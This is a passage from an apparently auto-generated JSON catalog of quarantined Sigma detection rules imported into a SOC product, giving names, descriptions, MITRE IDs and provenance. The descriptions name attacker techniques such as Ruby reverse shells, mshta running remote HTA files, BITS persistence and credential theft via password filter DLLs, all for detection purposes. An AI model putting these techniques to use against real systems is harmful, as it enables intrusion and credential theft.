"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml" } }, { "id": "sigmahq-sigma-b730a276-6b63-41b8-bcf8-55930c8fc6ee", "type": "detection", "name": "Csc.EXE Execution Form Potentially Suspicious Parent", "description": "Detects a potentially suspicious parent of \"csc.exe\", which could be a sign of payload delivery.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.005", "T1059.007", "T1218.005", "T1027.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/csc-exe-execution-form-potentially-suspicious-parent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml" } }, { "id": "sigmahq-sigma-b743623c-2776-40e0-87b1-682b975d0ca5", "type": "detection", "name": "User Added To Admin Group Via Dscl", "description": "Detects attempts to create and add an account to the admin group via \"dscl\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-added-to-admin-group-via-dscl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b743623c-2776-40e0-87b1-682b975d0ca5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_dscl_add_user_to_admin_group.yml" } }, { "id": "sigmahq-sigma-b7916c2a-fa2f-4795-9477-32b731f70f11", "type": "detection", "name": "Registry Persistence via Explorer Run Key", "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-persistence-via-explorer-run-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b7916c2a-fa2f-4795-9477-32b731f70f11", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml" } }, { "id": "sigmahq-sigma-b7966f4a-b333-455b-8370-8ca53c229762", "type": "detection", "name": "Dropping Of Password Filter DLL", "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dropping-of-password-filter-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b7966f4a-b333-455b-8370-8ca53c229762", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml" } }, { "id": "sigmahq-sigma-b7a3c9a3-09ea-4934-8864-6a32cacd98d9", "type": "detection", "name": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script", "description": "Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\nAn adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1074.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/zip-a-folder-with-powershell-for-staging-in-temp-powershell-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_zip_compress.yml" } }, { "id": "sigmahq-sigma-b7b19cb6-9b32-4fc4-a108-73f19acfe262", "type": "detection", "name": "Suspicious VBoxDrvInst.exe Parameters", "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-vboxdrvinst-exe-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml" } }, { "id": "sigmahq-sigma-b7bc7038-638b-4ffd-880c-292c692209ef", "type": "detection", "name": "Certificate Request Export to Exchange Webserver", "description": "Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/certificate-request-export-to-exchange-webserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b7bc7038-638b-4ffd-880c-292c692209ef", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml" } }, { "id": "sigmahq-sigma-b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", "type": "detection", "name": "Reg Add Suspicious Paths", "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/reg-add-suspicious-paths.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_susp_paths.yml" } }, { "id": "sigmahq-sigma-b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "type": "detection", "name": "PowerShell PSAttack", "description": "Detects the use of PSAttack PowerShell hack tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-psattack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_psattack.yml" } }, { "id": "sigmahq-sigma-b831353c-1971-477b-abb6-2828edc3bca1", "type": "detection", "name": "Azure Keyvault Secrets Modified or Deleted", "description": "Identifies when secrets are modified or deleted in Azure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552", "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-keyvault-secrets-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b831353c-1971-477b-abb6-2828edc3bca1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_keyvault_secrets_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-b85e5894-9b19-4d86-8c87-a2f3b81f0521", "type": "detection", "name": "BITS Transfer Job Downloading File Potential Suspicious Extension", "description": "Detects new BITS transfer job saving local files with potential suspicious extensions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bits-transfer-job-downloading-file-potential-suspicious-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml" } }, { "id": "sigmahq-sigma-b86852fb-4c77-48f9-8519-eb1b2c308b59", "type": "detection", "name": "Potential Persistence Via AppCompat RegisterAppRestart Layer", "description": "Detects the setting of the REGISTERAPPRESTART compatibility layer on an application.\nThis compatibility layer allows an application to register for restart using the \"RegisterApplicationRestart\" API.\nThis can be potentially abused as a persistence mechanism.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-appcompat-registerapprestart-layer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b86852fb-4c77-48f9-8519-eb1b2c308b59", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml" } }, { "id": "sigmahq-sigma-b86d356d-6093-443d-971c-9b07db583c68", "type": "detection", "name": "Suspicious Curl Change User Agents - Linux", "description": "Detects a suspicious curl process start on linux with set useragent options", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-curl-change-user-agents-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b86d356d-6093-443d-971c-9b07db583c68", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml" } }, { "id": "sigmahq-sigma-b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a", "type": "detection", "name": "File Download From IP Based URL Via CertOC.EXE", "description": "Detects when a user downloads a file from an IP based URL using CertOC.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-from-ip-based-url-via-certoc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certoc_download_direct_ip.yml" } }, { "id": "sigmahq-sigma-b888e3f2-224d-4435-b00b-9dd66e9ea1f1", "type": "detection", "name": "Uncommon Extension In Keyboard Layout IME File Registry Value", "description": "Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.\nBefore doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named \"Ime File\" with a DLL path.\nIMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-extension-in-keyboard-layout-ime-file-registry-value.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b888e3f2-224d-4435-b00b-9dd66e9ea1f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_ime_non_default_extension.yml" } }, { "id": "sigmahq-sigma-b8b1b304-a60f-4999-9a6e-c547bde03ffd", "type": "detection", "name": "DeviceCredentialDeployment Execution", "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/devicecredentialdeployment-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_device_credential_deployment.yml" } }, { "id": "sigmahq-sigma-b8bdac18-c06e-4016-ac30-221553e74f59", "type": "detection", "name": "Potential Ruby Reverse Shell", "description": "Detects execution of ruby with the \"-e\" flag and calls to \"socket\" related functions. This could be an indication of a potential attempt to setup a reverse shell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-ruby-reverse-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b8bdac18-c06e-4016-ac30-221553e74f59", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_ruby_reverse_shell.yml" } }, { "id": "sigmahq-sigma-b8fd0e93-ff58-4cbd-8f48-1c114e342e62", "type": "detection", "name": "Windows Binaries Write Suspicious Extensions", "description": "Detects Windows executables that write files with suspicious extensions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-binaries-write-suspicious-extensions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml" } }, { "id": "sigmahq-sigma-b91e8d5e-0033-44fe-973f-b730316f23a1", "type": "detection", "name": "Bitbucket Secret Scanning Exempt Repository Added", "description": "Detects when a repository is exempted from secret scanning feature.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-secret-scanning-exempt-repository-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b91e8d5e-0033-44fe-973f-b730316f23a1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_secret_scanning_exempt_repository_detected.yml" } }, { "id": "sigmahq-sigma-b923f7d6-ac89-4a50-a71a-89fb846b4aa8", "type": "detection", "name": "HackTool - Empire UserAgent URI Combo", "description": "Detects user agent and URI paths used by empire agents", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-empire-useragent-uri-combo.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b923f7d6-ac89-4a50-a71a-89fb846b4aa8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_hktl_empire_ua_uri_patterns.yml" } }, { "id": "sigmahq-sigma-b94bf91e-c2bf-4047-9c43-c6810f43baad", "type": "detection", "name": "AWS ECS Task Definition That Queries The Credential Endpoint", "description": "Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint.\nThis can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1525" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-ecs-task-definition-that-queries-the-credential-endpoint.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b94bf91e-c2bf-4047-9c43-c6810f43baad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_ecs_task_definition_cred_endpoint_query.yml" } }, { "id": "sigmahq-sigma-b96b2031-7c17-4473-afe7-a30ce714db29", "type": "detection", "name": "Use of FSharp Interpreters", "description": "Detects the execution of FSharp Interpreters \"FsiAnyCpu.exe\" and \"FSi.exe\"\nBoth can be used for AWL bypass and to execute F# code via scripts or inline.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-fsharp-interpreters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b96b2031-7c17-4473-afe7-a30ce714db29", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_fsi_fsharp_code_execution.yml" } }, { "id": "sigmahq-sigma-b97cd4b1-30b8-4a9d-bd72-6293928d52bc", "type": "detection", "name": "Indirect Command Execution By Program Compatibility Wizard", "description": "Detect indirect command execution via Program Compatibility Assistant pcwrun.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/indirect-command-execution-by-program-compatibility-wizard.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml" } }, { "id": "sigmahq-sigma-b98968aa-dbc0-4a9c-ac35-108363cbf8d5", "type": "detection", "name": "WINEKEY Registry Modification", "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/winekey-registry-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_runkey_winekey.yml" } }, { "id": "sigmahq-sigma-b98a10af-1e1e-44a7-bab2-4cc026917648", "type": "detection", "name": "New PDQDeploy Service - Client Side", "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-pdqdeploy-service-client-side.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b98a10af-1e1e-44a7-bab2-4cc026917648", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_pdqdeploy_runner.yml" } }, { "id": "sigmahq-sigma-b98d0db6-511d-45de-ad02-e82a98729620", "type": "detection", "name": "Remotely Hosted HTA File Executed Via Mshta.EXE", "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remotely-hosted-hta-file-executed-via-mshta-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b98d0db6-511d-45de-ad02-e82a98729620", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mshta_http.yml" } }, { "id": "sigmahq-sigma-b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", "type": "detection", "name": "HackTool - Inveigh Execution", "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-inveigh-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_inveigh.yml" } }, { "id": "sigmahq-sigma-b9aeac14-2ffd-4ad3-b967-1354a4e628c3", "type": "detection", "name": "PowerShell Get-Clipboard Cmdlet Via CLI", "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1115" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-get-clipboard-cmdlet-via-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml" } }, { "id": "sigmahq-sigma-b9cbbc17-d00d-4e3d-a827-b06d03d2380d", "type": "detection", "name": "Monitoring For Persistence Via BITS", "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished.\nWhen the job runs on the system the command specified in the BITS job will be executed.\nThis can be abused by actors to create a backdoor within the system and for persistence.\nIt will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/monitoring-for-persistence-via-bits.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml" } }, { "id": "sigmahq-sigma-b9d9b652-d8ed-4697-89a2-a1186ee680ac", "type": "detection", "name": "OSACompile Run-Only Execution", "description": "Detects potential suspicious run-only executions compiled using OSACompile", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/osacompile-run-only-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { 